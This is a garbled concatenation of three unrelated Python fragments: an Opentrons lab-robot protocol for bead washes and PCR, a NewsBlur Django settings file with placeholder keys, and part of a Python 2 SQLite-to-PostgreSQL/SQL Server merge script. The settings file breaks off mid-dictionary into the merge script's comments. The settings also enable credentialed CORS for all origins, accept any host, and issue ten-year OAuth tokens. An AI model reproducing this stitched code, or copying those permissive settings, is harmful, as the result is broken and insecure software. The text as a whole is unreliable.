# Step 2: Stop reaction
# TSB: 1 mL; 120 (150 µL) per tip
# add TSB to each sample.
# Prompt user to remove plate and run on thermocycler
### Is this step going to cross-contaminate? Seems wasteful to take a
### new tip for each sample. z = -1 meant to help.
# reagent tips 2
pipette_right.transfer(10,
reagents['A2'],
[mag_plate[x].top(z=-1) for x in cols],
touch_tip=True,
new_tip='once')
protocol.pause('Remove plate from magblock, seal, vortex, and run '
'program PTC on thermocycler. Then spin down, unseal, '
'and return to magblock.')
# Step 3: Cleanup
# TWB: 20 mL; 1200 (1500 µL) per tip
# Magnet wash 2X
# bind for specified length of time
protocol.comment('Binding beads to magnet.')
magblock.engage(height_from_base=mag_engage_height)
protocol.delay(seconds=pause_mag)
# ### Do first wash: 100 µL TWB
# buffer tips 2
protocol.comment('Doing wash #1.')
twb_remaining, twb_wells = bead_wash(# global arguments
protocol,
magblock,
pipette_left,
mag_plate,
cols,
# super arguments
waste['A1'],
tiprack_wash,
# wash buffer arguments,
twb_wells,
10000/8,
# mix arguments
tiprack_wash,
# optional arguments
wash_vol=100,
super_vol=60,
drop_super_tip=False,
mix_n=wash_mix,
mix_vol=90,
remaining=None)
# ### Do second wash: 100 µL TWB
# buffer tips 3
protocol.comment('Doing wash #2.')
twb_remaining, twb_wells = bead_wash(# global arguments
protocol,
magblock,
pipette_left,
mag_plate,
cols,
# super arguments
waste['A1'],
tiprack_wash,
# wash buffer arguments,
twb_wells,
10000/8,
# mix arguments
tiprack_wash,
# optional arguments
wash_vol=100,
super_vol=100,
drop_super_tip=False,
mix_n=wash_mix,
mix_vol=90,
remaining=twb_remaining)
# remove supernatant
remove_supernatant(pipette_left,
mag_plate,
cols,
tiprack_wash,
waste['A1'],
super_vol=120,
rate=bead_flow,
bottom_offset=.5,
drop_tip=False)
magblock.disengage()
# Step 3: amplification
# MM: 3 mL; 350 (400 µL) per tip
# buffer tips 4
pcr_remaining, pcr_wells = add_buffer(pipette_left,
mag_plate,
cols,
30,
pcr_wells,
200,
tip=None,
tip_vol=300,
remaining=None,
drop_tip=True)
# plate: primers i5
# reagent tips 3
pipette_right.transfer(10,
reagents['A5'],
[mag_plate[x].top(z=-1) for x in cols],
touch_tip=True,
new_tip='once')
# plate: primers i7
for col in cols:
pipette_right.pick_up_tip(tiprack_primers[col])
pipette_right.transfer(10,
i7_primers[col],
mag_plate[col],
mix_after=(5, 10),
touch_tip=True,
new_tip='never',
trash=False)
pipette_right.drop_tip()
# Prompt user to remove plate and run on thermocycler
# Repository: ap0ught/NewsBlur -- file: settings.py
import sys
import os
# ==========================
# = Directory Declarations =
# ==========================
CURRENT_DIR = os.path.dirname(__file__)
NEWSBLUR_DIR = CURRENT_DIR
TEMPLATE_DIRS = (os.path.join(CURRENT_DIR, 'templates'),
os.path.join(CURRENT_DIR, 'vendor/zebra/templates'))
MEDIA_ROOT = os.path.join(CURRENT_DIR, 'media')
STATIC_ROOT = os.path.join(CURRENT_DIR, 'static')
UTILS_ROOT = os.path.join(CURRENT_DIR, 'utils')
VENDOR_ROOT = os.path.join(CURRENT_DIR, 'vendor')
LOG_FILE = os.path.join(CURRENT_DIR, 'logs/newsblur.log')
IMAGE_MASK = os.path.join(CURRENT_DIR, 'media/img/mask.png')
# ==============
# = PYTHONPATH =
# ==============
if '/utils' not in ' '.join(sys.path):
sys.path.append(UTILS_ROOT)
if '/vendor' not in ' '.join(sys.path):
sys.path.append(VENDOR_ROOT)
import logging
import datetime
import redis
import raven
import django.http
import re
from mongoengine import connect
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from utils import jammit
# ===================
# = Server Settings =
# ===================
ADMINS = (
('<NAME>', '<EMAIL>'),
)
SERVER_NAME = 'newsblur'
SERVER_EMAIL = '<EMAIL>'
HELLO_EMAIL = '<EMAIL>'
NEWSBLUR_URL = 'http://www.newsblur.com'
IMAGES_URL = 'https://imageproxy.newsblur.com'
SECRET_KEY = 'YOUR_SECRET_KEY'
IMAGES_SECRET_KEY = "YOUR_SECRET_IMAGE_KEY"
# ===================
# = Global Settings =
# ===================
DEBUG = False
TEST_DEBUG = False
SEND_BROKEN_LINK_EMAILS = False
DEBUG_QUERIES = False
MANAGERS = ADMINS
PAYPAL_RECEIVER_EMAIL = '<EMAIL>'
TIME_ZONE = 'GMT'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/account/login'
MEDIA_URL = '/media/'
STATIC_URL = '/media/'
STATIC_ROOT = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
CIPHER_USERNAMES = False
DEBUG_ASSETS = DEBUG
HOMEPAGE_USERNAME = 'popular'
ALLOWED_HOSTS = ['*']
AUTO_PREMIUM_NEW_USERS = False
AUTO_ENABLE_NEW_USERS = True
ENFORCE_SIGNUP_CAPTCHA = True
PAYPAL_TEST = False
# Uncomment below to force all feeds to store this many stories. Default is to cut
# off at 25 stories for single subscriber non-premium feeds and 500 for popular feeds.
# OVERRIDE_STORY_COUNT_MAX = 1000
# ===========================
# = Django-specific Modules =
# ===========================
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.media",
'django.core.context_processors.request',
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'apps.profile.middleware.TimingMiddleware',
'apps.profile.middleware.LastSeenMiddleware',
'apps.profile.middleware.UserAgentBanMiddleware',
'subdomains.middleware.SubdomainMiddleware',
'corsheaders.middleware.CorsMiddleware',
'apps.profile.middleware.SimpsonsMiddleware',
'apps.profile.middleware.ServerHostnameMiddleware',
'oauth2_provider.middleware.OAuth2TokenMiddleware',
# 'debug_toolbar.middleware.DebugToolbarMiddleware',
'apps.profile.middleware.DBProfilerMiddleware',
'apps.profile.middleware.SQLLogToConsoleMiddleware',
'utils.mongo_raw_log_middleware.MongoDumpMiddleware',
'utils.redis_raw_log_middleware.RedisDumpMiddleware',
)
AUTHENTICATION_BACKENDS = (
'oauth2_provider.backends.OAuth2Backend',
'django.contrib.auth.backends.ModelBackend',
)
CORS_ORIGIN_ALLOW_ALL = True
# CORS_ORIGIN_REGEX_WHITELIST = ('^(https?://)?(\w+\.)?newsblur\.com$', )
CORS_ALLOW_CREDENTIALS = True
OAUTH2_PROVIDER = {
'SCOPES': {
'read': 'View new unread stories, saved stories, and shared stories.',
'write': 'Create new saved stories, shared stories, and subscriptions.',
'ifttt': 'Pair your NewsBlur account with other services.',
},
'CLIENT_ID_GENERATOR_CLASS': 'oauth2_provider.generators.ClientIdGenerator',
'ACCESS_TOKEN_EXPIRE_SECONDS': 60*60*24*365*10, # 10 years
'AUTHORIZATION_CODE_EXPIRE_SECONDS': 60*60, # 1 hour
}
# ===========
# = Logging =
# ===========
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '[%(asctime)-12s] %(message)s',
'datefmt': '%b %d %H:%M:%S'
},
'simple': {
'format': '%(message)s'
},
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'pyes':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'vendor.apns':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'log_file':{
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': LOG_FILE,
'maxBytes': 16777216, # 16 MB
'formatter': 'verbose'
},
'mail_admins': {
'level': 'CRITICAL',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
'include_html': True,
},
# 'sentry': {
# 'level': 'ERROR',
# 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler'
# },
},
'loggers': {
'django.request': {
'handlers': ['console', 'log_file'],
'level': 'ERROR',
'propagate': True,
},
'django.db.backends': {
'handlers': ['null'],
'level': 'DEBUG',
'propagate': False,
},
'django.security.DisallowedHost': {
'handlers': ['null'],
'propagate': False,
},
'newsblur': {
'handlers': ['console', 'log_file'],
'level': 'DEBUG',
'propagate': False,
},
'readability': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'pyes': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'apps': {
'handlers': ['log_file'],
'level': 'INFO',
'propagate': True,
},
# 'raven': {
# 'level': 'DEBUG',
# 'handlers': ['console'],
# 'propagate': False,
# },
# 'sentry.errors': {
# 'level': 'DEBUG',
# 'handlers': ['console'],
# 'propagate': False,
# },
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
}
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
# ==========================
# = Miscellaneous Settings =
# ==========================
DAYS_OF_UNREAD = 30
DAYS_OF_UNREAD_FREE = 14
# DAYS_OF_STORY_HASHES can be larger: raise it by N first, and after N days
# you can raise DAYS_OF_UNREAD by the same amount with no impact.
DAYS_OF_STORY_HASHES = 30
SUBSCRIBER_EXPIRE = 7
AUTH_PROFILE_MODULE = 'newsblur.UserProfile'
TEST_DATABASE_COLLATION = 'utf8_general_ci'
TEST_DATABASE_NAME = 'newsblur_test'
ROOT_URLCONF = 'urls'
INTERNAL_IPS = ('127.0.0.1',)
LOGGING_LOG_SQL = True
APPEND_SLASH = False
SOUTH_TESTS_MIGRATE = False
SESSION_ENGINE = 'redis_sessions.session'
TEST_RUNNER = "utils.testrunner.TestRunner"
SESSION_COOKIE_NAME = 'newsblur_sessionid'
SESSION_COOKIE_AGE = 60*60*24*365 # 1 year
SESSION_COOKIE_DOMAIN = '.newsblur.com'
SENTRY_DSN = 'https://[email protected]/99999999'
if DEBUG:
# EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_BACKEND = 'vendor.mailgun.MailgunBackend'
else:
EMAIL_BACKEND = 'vendor.mailgun.MailgunBackend'
# ==============
# = Subdomains =
# ==============
SUBDOMAIN_URLCONFS = {
None: 'urls',
'www': 'urls',
}
REMOVE_WWW_FROM_DOMAIN = True
# ===========
# = Logging =
# ===========
LOG_LEVEL = logging.DEBUG
LOG_TO_STREAM = False
# ===============
# = Django Apps =
# ===============
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django_extensions',
'djcelery',
# 'kombu.transport.django',
'vendor.paypal.standard.ipn',
'apps.rss_feeds',
'apps.reader',
'apps.analyzer',
'apps.feed_import',
'apps.profile',
'apps.recommendations',
'apps.statistics',
'apps.notifications',
'apps.static',
'apps.mobile',
'apps.push',
'apps.social',
'apps.oauth',
'apps.search',
'apps.categories',
'south',
'utils',
'vendor',
'vendor.typogrify',
'vendor.zebra',
'oauth2_provider',
'corsheaders',
)
# ==========
# = Stripe =
# ==========
STRIPE_SECRET = "YOUR-SECRET-API-KEY"
STRIPE_PUBLISHABLE = "YOUR-PUBLISHABLE-API-KEY"
ZEBRA_ENABLE_APP = True
# ==========
# = Celery =
# ==========
import djcelery
djcelery.setup_loader()
# from celery import Celery
# celeryapp = Celery()
# celeryapp.config_from_object('django.conf:settings')
CELERY_ROUTES = {
"work-queue": {
"queue": "work_queue",
"binding_key": "work_queue"
},
"new-feeds": {
"queue": "new_feeds",
"binding_key": "new_feeds"
},
"push-feeds": {
"queue": "push_feeds",
"binding_key": "push_feeds"
},
"update-feeds": {
"queue": "update_feeds",
"binding_key": "update_feeds"
},
"beat-tasks": {
"queue": "beat_tasks",
"binding_key": "beat_tasks"
},
"search-indexer": {
"queue": "search_indexer",
"binding_key": "search_indexer"
},
"search-indexer-tasker": {
"queue": "search_indexer_tasker",
"binding_key": "search_indexer_tasker"
},
}
CELERY_QUEUES = {
"work_queue": {
"exchange": "work_queue",
"exchange_type": "direct",
"binding_key": "work_queue",
},
"new_feeds": {
"exchange": "new_feeds",
"exchange_type": "direct",
"binding_key": "new_feeds"
},
"push_feeds": {
"exchange": "push_feeds",
"exchange_type": "direct",
"binding_key": "push_feeds"
},
"update_feeds": {
"exchange": "update_feeds",
"exchange_type": "direct",
"binding_key": "update_feeds"
},
"beat_tasks": {
"exchange": "beat_tasks",
"exchange_type": "direct",
"binding_key": "beat_tasks"
},
"beat_feeds_task": {
"exchange": "beat_feeds_task",
"exchange_type": "direct",
"binding_key": "beat_feeds_task"
},
"search_indexer": {
"exchange": "search_indexer",
"exchange_type": "direct",
"binding_key": "search_indexer"
},
"search_indexer_tasker": {
"exchange": "search_indexer_tasker",
"exchange_type": "direct",
"binding_key": "search_indexer_tasker"
},
}
CELERY_DEFAULT_QUEUE = "work_queue"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_IMPORTS = ("apps.rss_feeds.tasks",
"apps.social.tasks",
"apps.reader.tasks",
"apps.profile.tasks",
"apps.feed_import.tasks",
"apps.search.tasks",
"apps.statistics.tasks",)
CELERYD_CONCURRENCY = 4
CELERY_IGNORE_RESULT = True
CELERY_ACKS_LATE = True # Retry if task fails
CELERYD_MAX_TASKS_PER_CHILD = 10
CELERYD_TASK_TIME_LIMIT = 12 * 30
CELERY_DISABLE_RATE_LIMITS = True
SECONDS_TO_DELAY_CELERY_EMAILS = 60
CELERYBEAT_SCHEDULE = {
'task-feeds': {
'task': 'task-feeds',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_feeds_task'},
},
'task-broken-feeds': {
'task': 'task-broken-feeds',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_feeds_task'},
},
'freshen-homepage': {
'task': 'freshen-homepage',
'schedule': datetime.timedelta(hours=1),
'options': {'queue': 'beat_tasks'},
},
'collect-stats': {
'task': 'collect-stats',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_tasks'},
},
'collect-feedback': {
'task': 'collect-feedback',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_tasks'},
},
'share-popular-stories': {
'task': 'share-popular-stories',
'schedule': datetime.timedelta(minutes=10),
'options': {'queue': 'beat_tasks'},
},
'clean-analytics': {
'task': 'clean-analytics',
'schedule': datetime.timedelta(hours=12),
'options': {'queue': 'beat_tasks', 'timeout': 720*10},
},
'reimport-stripe-history': {
'task': 'reimport-stripe-history',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_tasks'},
},
'clean-spam': {
'task': 'clean-spam',
'schedule': datetime.timedelta(hours=1),
'options': {'queue': 'beat_tasks'},
},
'clean-social-spam': {
'task': 'clean-social-spam',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_tasks'},
},
'premium-expire': {
'task': 'premium-expire',
'schedule': datetime.timedelta(hours=24),
'options': {'queue': 'beat_tasks'},
},
'activate-next-new-user': {
'task': 'activate-next-new-user',
'schedule': datetime.timedelta(minutes=5),
'options': {'queue': 'beat_tasks'},
},
}
# =========
# = Mongo =
# =========
MONGO_DB = {
'host': 'db_mongo:27017',
'name': 'newsblur',
}
MONGO_ANALYTICS_DB = {
'host': 'db_mongo_analytics:27017',
'name': 'nbanalytics',
}
# ====================
# = Database Routers =
# ====================
class MasterSlaveRouter(object):
"""A router that sets up a simple master/slave configuration"""
def db_for_read(self, model, **hints):
"Point all read operations to a random slave"
return 'slave'
def db_for_write(self, model, **hints):
"Point all write operations to the master"
return 'default'
def allow_relation(self, obj1, obj2, **hints):
"Allow any relation between two objects in the db pool"
db_list = ('slave','default')
if obj1._state.db in db_list and obj2._state.db in db_list:
return True
return None
def allow_syncdb(self, db, model):
"Explicitly put all models on all databases."
return True
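# A minimal sketch of how this router could be wired up (an assumption --
# the actual DATABASES definition lives in local_settings.py and may differ):
# DATABASES = {
#     'default': {'ENGINE': 'django.db.backends.mysql', 'NAME': 'newsblur', 'HOST': 'db_master'},
#     'slave': {'ENGINE': 'django.db.backends.mysql', 'NAME': 'newsblur', 'HOST': 'db_slave'},
# }
# DATABASE_ROUTERS = ['settings.MasterSlaveRouter']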
# =========
# = Redis =
# =========
REDIS = {
'host': 'db_redis',
}
REDIS_PUBSUB = {
'host': 'db_redis_pubsub',
}
REDIS_STORY = {
'host': 'db_redis_story',
}
REDIS_SESSIONS = {
'host': 'db_redis_sessions',
}
CELERY_REDIS_DB_NUM = 4
SESSION_REDIS_DB = 5
# =================
# = Elasticsearch =
# =================
ELASTICSEARCH_FEED_HOSTS = ['db_search_feed:9200']
ELASTICSEARCH_STORY_HOSTS = ['db_search_story:9200']
# ===============
# = Social APIs =
# ===============
FACEBOOK_APP_ID = '111111111111111'
FACEBOOK_SECRET = '99999999999999999999999999999999'
FACEBOOK_NAMESPACE = 'newsblur'
TWITTER_CONSUMER_KEY = 'ooooooooooooooooooooo'
TWITTER_CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
YOUTUBE_API_KEY = "<KEY>"
# ===============
# = AWS Backing =
# ===============
ORIGINAL_PAGE_SERVER = "db_pages:3060"
BACKED_BY_AWS = {
'pages_on_s3': False,
'icons_on_s3': False,
}
PROXY_S3_PAGES = True
S3_BACKUP_BUCKET = 'newsblur_backups'
S3_PAGES_BUCKET_NAME = 'pages.newsblur.com'
S3_ICONS_BUCKET_NAME = 'icons.newsblur.com'
S3_AVATARS_BUCKET_NAME = 'avatars.newsblur.com'
# ==================
# = Configurations =
# ==================
from local_settings import *
if not DEBUG:
INSTALLED_APPS += (
'raven.contrib.django',
'django_ses',
)
# RAVEN_CLIENT = raven.Client(dsn=SENTRY_DSN, release=raven.fetch_git_sha(os.path.dirname(__file__)))
RAVEN_CLIENT = raven.Client(SENTRY_DSN)
COMPRESS = not DEBUG
TEMPLATE_DEBUG = DEBUG
ACCOUNT_ACTIVATION_DAYS = 30
AWS_ACCESS_KEY_ID = S3_ACCESS_KEY
AWS_SECRET_ACCESS_KEY = S3_SECRET
os.environ["AWS_ACCESS_KEY_ID"] = AWS_ACCESS_KEY_ID
os.environ["AWS_SECRET_ACCESS_KEY"] = AWS_SECRET_ACCESS_KEY
def custom_show_toolbar(request):
return DEBUG
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': True,
'SHOW_TOOLBAR_CALLBACK': custom_show_toolbar,
'HIDE_DJANGO_SQL': False,
}
if DEBUG:
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
else:
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# =========
# = Mongo =
# =========
MONGO_DB_DEFAULTS = {
'name': 'newsblur',
'host': 'db_mongo:27017',
'alias': 'default',
}
MONGO_DB = dict(MONGO_DB_DEFAULTS, **MONGO_DB)
# MONGO_URI = 'mongodb://%s' % (MONGO_DB.pop('host'),)
# if MONGO_DB.get('read_preference', pymongo.ReadPreference.PRIMARY) != pymongo.ReadPreference.PRIMARY:
# MONGO_PRIMARY_DB = MONGO_DB.copy()
# MONGO_PRIMARY_DB.update(read_preference=pymongo.ReadPreference.PRIMARY)
# MONGOPRIMARYDB = connect(MONGO_PRIMARY_DB.pop('name'), **MONGO_PRIMARY_DB)
# else:
# MONGOPRIMARYDB = MONGODB
# MONGODB = connect(MONGO_DB.pop('name'), host=MONGO_URI, **MONGO_DB)
MONGODB = connect(MONGO_DB.pop('name'), **MONGO_DB)
# MONGODB = connect(host="mongodb://localhost:27017/newsblur", connect=False)
MONGO_ANALYTICS_DB_DEFAULTS = {
'name': 'nbanalytics',
'host': 'db_mongo_analytics:27017',
'alias': 'nbanalytics',
}
MONGO_ANALYTICS_DB = dict(MONGO_ANALYTICS_DB_DEFAULTS, **MONGO_ANALYTICS_DB)
# MONGO_ANALYTICS_URI = 'mongodb://%s' % (MONGO_ANALYTICS_DB.pop('host'),)
# MONGOANALYTICSDB = connect(MONGO_ANALYTICS_DB.pop('name'), host=MONGO_ANALYTICS_URI, **MONGO_ANALYTICS_DB)
MONGOANALYTICSDB = connect(MONGO_ANALYTICS_DB.pop('name'), **MONGO_ANALYTICS_DB)
# =========
# = Redis =
# =========
BROKER_BACKEND = "redis"
BROKER_URL = "redis://%s:6379/%s" % (REDIS['host'], CELERY_REDIS_DB_NUM)
CELERY_RESULT_BACKEND = BROKER_URL
SESSION_REDIS_HOST = REDIS_SESSIONS['host']
SESSION_REDIS_RETRY_ON_TIMEOUT = True
SESSION_REDIS_SOCKET_TIMEOUT = 10
CACHES = {
'default':
psql to do first manually if log was already imported using older azm_db_merge:
# alter table all_logs.lte_volte_rtp_msg alter column lte_volte_rtp_source_ssrc type bigint;
# alter table all_logs.lte_volte_rtp_msg alter column lte_volte_rtp_timestamp type bigint;
col_type = "bigint"
#######################
is_already_in_table = col_name in remote_column_names
dprint("local_col_name: " + col_name +
" col_type: " + col_type +
" - is_already_in_table: "+str(is_already_in_table))
if (not is_already_in_table):
local_columns_not_in_remote.append(
' "{}" {}'.format(col_name, col_type))
# TODO: handle if different type?
n_cols_to_add = len(local_columns_not_in_remote)
if (n_cols_to_add == 0):
dprint("n_cols_to_add == 0 - no need to alter table")
else:
print "n_cols_to_add: " + str(n_cols_to_add) + " - need to alter table - add cols:" + str(local_columns_not_in_remote) + "\nremote_cols:\n"+str(remote_columns)
# example: ALTER TABLE dbo.doc_exa ADD column_b VARCHAR(20) NULL, column_c INT NULL ;
alter_str = "ALTER TABLE \"{}\" ".format(table_name)
alter_cols = ""
for new_col in local_columns_not_in_remote:
# not first
prefix = ""
if (alter_cols != ""):
prefix = ", "
alter_cols = alter_cols + prefix + " ADD " + new_col
alter_str = alter_str + alter_cols + ";"
sqlstr = sql_adj_line(alter_str)
print "execute alter_str: " + sqlstr
exec_creatept_or_alter_handle_concurrency(sqlstr)
# re-get remote cols
remote_columns = get_remote_columns(args, table_name)
remote_column_names = get_col_names(remote_columns)
print("get_remote_columns after alter: "+str(remote_column_names))
else:
raise Exception("FATAL: create table error - : \nemsg:\n "+emsg+" \nsqlstr:\n"+sqlstr)
if g_bulk_insert_mode:
if args['pg10_partition_by_month']:
if table_name == "logs":
# dont partition logs table
pass
else:
log_hash = args['log_hash']
## check/create partitions for month for log_hash, prev month, after month
ori_log_hash_datetime = datetime.datetime.fromtimestamp(log_hash & 0xffffffff) # log_hash lower 32 bits is the timestamp
months_pt_check_list = [ori_log_hash_datetime+relativedelta(months=-1), ori_log_hash_datetime, ori_log_hash_datetime+relativedelta(months=+1)]
for log_hash_datetime in months_pt_check_list:
log_hash_ym_str = log_hash_datetime.strftime('%Y_%m')
print "log_hash_datetime:", log_hash_datetime
ntn = "logs_{}".format(log_hash_ym_str) # simpler name because we got cases where schema's table name got truncated: activate_dedicated_eps_bearer_context_request_params_3170932708
pltn = "{}.{}".format(schema_per_month_name, ntn)
per_month_table_already_exists = False
with g_conn as c:
check_sql = "select * from information_schema.tables where table_schema='{}' and table_name='{}'".format(schema_per_month_name, ntn)
print "check_sql:", check_sql
g_cursor.execute(check_sql)
if bool(g_cursor.rowcount):
per_month_table_already_exists = True
if per_month_table_already_exists:
print "omit create already existing per_month table:", pltn
else:
print "NOT omit create already existing per_month table:", pltn
cre_target_pt_sql = "CREATE TABLE {} PARTITION OF {} FOR VALUES from ('{}-1') to ('{}-1');".format(
pltn,
table_name,
log_hash_datetime.strftime("%Y-%m"),
(log_hash_datetime+relativedelta(months=+1)).strftime("%Y-%m")
)
if args['pg10_partition_index_log_hash']:
cre_index_for_pt_sql = "CREATE INDEX ON {} (log_hash);".format(pltn)
cre_target_pt_sql += " "+cre_index_for_pt_sql
print("cre_target_pt_sql:", cre_target_pt_sql)
exec_creatept_or_alter_handle_concurrency(cre_target_pt_sql, allow_exstr_list=[" already exists"])
###### let sqlite3 dump contents of table into file
table_dump_fp = os.path.join(g_dir_processing_azm, table_name + ".csv")
table_dump_format_fp = os.path.join(g_dir_processing_azm, table_name + ".fmt")
#print("table_dump_fp: "+table_dump_fp)
#print("table_dump_format_fp: "+table_dump_format_fp)
# create dump csv of that table
"""
example dump of logs table:
sqlite3 azqdata.db -list -newline "|" -separator "," ".out c:\\azq\\azq_report_gen\\azm_db_merge\\logs.csv" "select * from logs"
"""
# get col list, and hex(col) for blob coulumns
geom_col_index = -1
i = 0
col_select = ""
first = True
dprint("local_columns: "+str(local_columns))
for col in local_columns:
col_name = col[0]
col_type = col[1]
if first:
first = False
else:
col_select = col_select + ","
pre = " "
post = ""
if col_type == "geometry" or (g_is_postgre and col_type == "bytea") or (g_is_ms and col_type.startswith("varbinary")):
pre = " hex("
post = ")"
if col_name == "geom":
geom_col_index = i
col_select = col_select + pre + col_name + post
i = i + 1
dprint("col_select: "+col_select)
if g_is_ms:
ret = call(
[
args['sqlite3_executable'],
args['file'],
"-ascii",
"-list",
'-separator', azm_db_constants.BULK_INSERT_COL_SEPARATOR_VALUE,
'-newline', azm_db_constants.BULK_INSERT_LINE_SEPARATOR_VALUE,
'.out ' + '"' +table_dump_fp.replace("\\","\\\\") + '"', # double backslash because it needs to go inside sqlite3 cmd parsing again
'select '+col_select+' from '+ table_name
], shell = False
)
if g_is_postgre:
dump_cmd = [
args['sqlite3_executable'],
args['file'],
"-ascii",
"-csv",
'-separator',',',
'-newline', '\n',
'.out ' + '"' +table_dump_fp.replace("\\","\\\\") + '"', # double backslash because it needs to go inside sqlite3 cmd parsing again
'select '+col_select+' from '+ table_name
]
dprint("dump_cmd:", dump_cmd)
ret = call(
dump_cmd,
shell=False
)
table_dump_fp_adj = table_dump_fp + "_adj.csv"
# dont add lines where all cols are null - bug in older azm files causing COPY to fail...
all_cols_null_line = ""
for ci in range(len(local_columns)):
if ci != 0:
all_cols_null_line += ","
print "all_cols_null_line:", all_cols_null_line
pd_csvadj_success = False
# a preliminary pandas version (without geom conversion yet) proved slower than looping through the file in Python and also failed on the events table, so it is disabled for now...
"""
if g_is_postgre:
# try use pandas to adjust csv instead of looping through file...
try:
import pandas as pd
df = pd.read_csv(table_dump_fp, header=None, names=local_column_names)
print "df.columns:", df.columns
print "pd table_dump_fp df len:", len(df)
df.geom = None
df = df.dropna(how='all')
df.to_csv(table_dump_fp_adj, header=None)
pd_csvadj_success = True
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print "pd_csvadj exception:", exstr
print "pd_csvadj_success:", pd_csvadj_success
"""
if not pd_csvadj_success:
with open(table_dump_fp,"rb") as of:
with open(table_dump_fp_adj,"wb") as nf: # wb required for windows so that \n is 0x0A - otherwise \n will be 0x0D 0x0A and doesn't go with our fmt file and only 1 row will be inserted per table csv in bulk inserts...
while True:
ofl = of.readline()
if g_is_postgre:
ofl = ofl.replace(',""',',')
""" no need to check this, only old stale thread versions would have these cases and will have other cases too so let it crash in all those cases
if ofl.strip() == all_cols_null_line:
continue
"""
ofl = find_and_conv_spatialite_blob_to_wkb(ofl)
if ofl == "":
break
nf.write(ofl)
table_dump_fp = table_dump_fp_adj
dprint("dump table: "+table_name+" for bulk insert ret: "+str(ret))
if (ret != 0):
print "WARNING: dump table: "+table_name+" for bulk insert failed - likely sqlite db file error like: database disk image is malformed. In many cases, data is still correct/complete so continue."
if (os.stat(table_dump_fp).st_size == 0):
print "this table is empty..."
return True
# if control reaches here then the table is not empty
if g_is_ms and is_contains_geom_col:
# add this table:geom to 'geometry_columns' (table_name was set to UNIQUE so it will fail if already exists...
""" somehow not working - let QGIS detect automatically itself for now...
try:
insert_geomcol_sqlstr = "INSERT INTO \"geometry_columns\" VALUES('azq','dbo','{}','geom',NULL,4326,'POINT');".format(table_name)
dprint("insert_geomcol_sqlstr: "+insert_geomcol_sqlstr)
ret = g_cursor.execute(insert_geomcol_sqlstr)
print "insert this table:geom into geometry_columns done"
except Exception as e:
estr = str(e)
dprint("insert this table:geom into geometry_columns exception: "+estr)
pass
"""
# create fmt format file for that table
"""
generate format file:
https://msdn.microsoft.com/en-us/library/ms178129.aspx
format file contents:
https://msdn.microsoft.com/en-us/library/ms191479(v=sql.110).aspx
"""
n_local_cols = len(local_column_names)
fmt = open(table_dump_format_fp,"w")
fmt.write("11.0\n") # ver - 11.0 = SQL Server 2012
fmt.write(str(n_local_cols)+"\n") # n cols
host_field_order = 0 # dyn gen - first inc will get it to 1
host_file_data_type = "SQLCHAR"
prefix_length = 0
host_file_data_length = 0 # When a delimited text file having a prefix length of 0 and a terminator is imported, the field-length value is ignored, because the storage space used by the field equals the length of the data plus the terminator
terminator = None # dyn gen
server_col_order = None # dyn gen
server_col_name = None # dyn gen
col_coalition = ""
for col in local_column_names:
host_field_order = host_field_order + 1
if (n_local_cols == host_field_order): #last
terminator = azm_db_constants.BULK_INSERT_LINE_SEPARATOR_PARAM
else:
terminator = azm_db_constants.BULK_INSERT_COL_SEPARATOR_PARAM
if not table_name.startswith("wifi_scanned"):
dprint("remote_column_names: "+str(remote_column_names))
pass
dprint("col: "+str(col))
server_col_order = remote_column_names.index(col) + 1 # not 0 based
server_col_name = col # always same col name
fmt.write(
'{}\t{}\t{}\t{}\t"{}"\t{}\t"{}"\t"{}"\n'.format(
host_field_order,
host_file_data_type,
prefix_length,
host_file_data_length,
terminator,
server_col_order,
server_col_name,
col_coalition
)
)
fmt.flush()
fmt.close()
# both dump csv and format fmt files are ready
# execute bulk insert sql now
if g_is_ms:
